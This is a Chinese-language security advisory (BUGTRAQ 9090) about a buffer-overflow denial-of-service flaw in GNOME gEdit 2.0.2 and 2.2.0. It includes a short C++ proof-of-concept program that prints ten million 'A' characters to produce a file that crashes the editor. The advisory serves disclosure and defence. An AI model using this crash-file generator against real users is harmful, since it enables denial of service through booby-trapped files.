发布日期：2003-11-23
更新日期：2003-11-28

受影响系统：

GNOME gEdit 2.2.0
GNOME gEdit 2.0.2

描述：

---

BUGTRAQ  ID: 9090

GEdit是一款文本编辑器。

GEdit在处理大IOStream文件时存在问题，本地攻击者可以利用这个漏洞构建恶意文件，诱使用户打开，可造成内存破坏。

当处理包含超长字符串的IOStream文件时，可导致内存破坏，造成拒绝服务。

<*来源：MegaHz （costcon@cytanet.com.cy）
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

MegaHz （costcon@cytanet.com.cy）提供了如下测试方法：

/*
        simple buffer overflow generator by MegaHz megahz@megahz.org
*/
#include <iostream>
using namespace std;

int main()
{
int i;
for (i=0;i<=9999999;i++)
        {
        cout << "A";
        }
        return 0;
}

建议：

---

厂商补丁：

GNOME
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://gedit.sourceforge.net/

浏览次数：2620
严重程度：0（网友投票）